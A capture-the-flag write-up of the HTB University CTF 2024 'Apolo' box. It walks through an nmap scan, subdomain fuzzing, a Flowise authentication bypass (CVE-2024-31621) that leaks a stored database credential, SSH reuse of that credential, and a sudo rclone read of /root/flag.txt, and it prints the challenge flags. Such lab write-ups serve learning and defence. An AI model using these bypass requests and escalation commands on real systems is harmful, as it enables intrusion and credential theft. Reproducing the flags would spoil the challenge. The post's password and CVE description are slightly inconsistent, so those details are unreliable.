Post

HTB University CTF 2024 (Apolo)

On the 13th to 15th December 2024, I participated in HTB University CTF 2024 Binary Badlands with UiTM. I managed to solve Apolo challenge.

HTB University CTF 2024 (Apolo)

Banner

Enumeration Phase

Nmap Scan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
$ nmap -sV -A -p- 10.129.246.166 > nmap.txt | cat nmap.txt

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-13 22:10 +08
Nmap scan report for apolo.htb (10.129.246.166)
Host is up (0.027s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Apolo
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Web Enumeration

Add the following line to /etc/hosts :

1
10.129.246.166  apolo.htb

Opening apolo.htb in browser will show us the main page.

Enum1

Seems like there’s nothing interesting here.

Subdomain Enumeration

1
ffuf -u http://apolo.htb -H "Host: FUZZ.apolo.htb" -w /path/to/wordlist -fc 302

Enum2

We got a hit at ai.apolo.htb. Now add it to /etc/hosts just like earlier.

1
10.129.246.166  ai.apolo.htb

Opening ai.apolo.htb in our browser will show some type of login page (I forgot to take a screenshot).

Exploitation Phase

Finding Vulnerability: Flowise Authentication Bypass

When searching for exploits, I stumbled upon CVE-2024-31621.

CVE-2024-31621 is a critical vulnerability identified in Flowise, a product by FlowiseAI Inc., affecting versions up to and including 1.6.2. This vulnerability allows a remote attacker to execute arbitrary code by sending a crafted script to the api/v1 component

Sending a request at /API/V1/credentials will returns this response.

1
2
3
4
5
6
7
  {
    "id": "6cfda83a-b055-4fd8-a040-57e5f1dae2eb",
    "name": "MongoDB",
    "credentialName": "mongoDBUrlApi",
    "createdDate": "2024-11-14T09:02:56.000Z",
    "updatedDate": "2024-11-14T09:02:56.000Z"
  }

Using the id earlier we can send another request at /API/V1/credentials/6cfda83a-b055-4fd8-a040-57e5f1dae2eb. This will returns.

1
2
3
4
5
6
7
8
9
{
  "id": "6cfda83a-b055-4fd8-a040-57e5f1dae2eb",
  "name": "MongoDB",
  "credentialName": "mongoDBUrlApi",
  "createdDate": "2024-11-14T09:02:56.000Z",
  "updatedDate": "2024-11-14T09:02:56.000Z",
  "plainDataObj": {
    "mongoDBConnectorUrl": "mongodb+srv://lewis:Compl3xi3Ty!_W1n3@cluster0.mongodb.net/myDatabase?retryWrites=true&w=majority"
  }

Here’s how it looks at Burpsuite.

User1

User Flag

From the response earlier, managed to obtain a credential: lewis:Compl3xi3Ty!

Now we can SSH as lewis and get the User Flag.

User-Flag

1
HTB{llm_ex9l01t_4_RC3}

User Flag: HTB{llm_ex9l01t_4_RC3}

Root Flag

Privilege Escalation

1
sudo -l

Seems like lewis has permission to use sudo on rclone.

Root1

Now we can inject our command to get the Root Flag

1
sudo rclone cat /root/flag.txt

Root-Flag

1
HTB{cl0n3_rc3_f1l3}

Root Flag: HTB{cl0n3_rc3_f1l3}

Summary

  • API Vulnerabilities: A case-sensitivity flaw in Flowise’s authentication middleware has led to unauthorized API access. Highlighting the importance of robust validation mechanisms.
  • Credential Reuse: The reuse of MongoDB credentials for SSH highlighted the critical importance of using unique credentials for different services.
  • Misconfigured Sudo Permissions: Granting unrestricted sudo access to a powerful tool like Rclone can result in privilege escalation. Adhering to the principle of least privilege is essential.
This post is licensed under CC BY 4.0 by the author.